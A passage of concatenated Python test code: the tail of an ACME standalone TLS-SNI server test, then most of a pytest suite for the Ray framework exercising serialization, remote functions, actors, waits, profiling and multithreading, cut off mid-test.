if self.process.is_alive():
self.process.terminate()
self.process.join(timeout=5)
# Check that we didn't timeout waiting for the process to
# terminate.
self.assertNotEqual(self.process.exitcode, None)
shutil.rmtree(self.test_cwd)
@mock.patch('acme.standalone.TLSSNI01Server.handle_request')
def test_mock(self, handle):
from acme.standalone import simple_tls_sni_01_server
simple_tls_sni_01_server(cli_args=['path', '-p', str(self.port)], forever=False)
self.assertEqual(handle.call_count, 1)
def test_live(self):
self.process.start()
cert = None
for _ in range(50):
time.sleep(0.1)
try:
cert = crypto_util.probe_sni(b'localhost', b'127.0.0.1', self.port)
break
except errors.Error: # pragma: no cover
pass
self.assertEqual(jose.ComparableX509(cert),
test_util.load_comparable_cert('rsa2048_cert.pem'))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
runtest.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import random
import re
import setproctitle
import string
import subprocess
import sys
import threading
import time
from collections import defaultdict, namedtuple, OrderedDict
from concurrent.futures import ThreadPoolExecutor
import numpy as np
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.test.cluster_utils
import ray.test.test_utils
logger = logging.getLogger(__name__)
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently np.testing.assert_equal
# fails because we do not properly handle different numerical
# types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), ("Objects {} "
"and {} are "
"different.".format(
obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), ("Objects {} and {} are named tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world", u"\xff\xfe\x9c\x001\x000\x00",
None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
}
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = namedtuple("Point", ["x", "y"])
NamedTupleExample = namedtuple("Example",
"field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3])
]
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = (
[{
obj: obj
} for obj in PRIMITIVE_OBJECTS
if (obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_passing_arguments_by_value(ray_start):
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
with pytest.raises(ray.raylet.common_error):
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test subtypes of dictionaries.
value_before = OrderedDict([("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: 0, [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
value_before = defaultdict(lambda: [], [("hello", 1), ("world", 2)])
object_id = ray.put(value_before)
assert value_before == ray.get(object_id)
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
# Test returning custom classes created on workers.
@ray.remote
def g():
return SubQux(), Qux()
subqux, qux = ray.get(g.remote())
assert subqux.objs[2].foo.value == 0
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert_equal(ray.get(h.remote()), np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.test.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# relase resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=20, num_repeats=50):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000,
)
assert len(ready) == len(wait_objects)
for _ in range(50):
num = 20
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(20)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
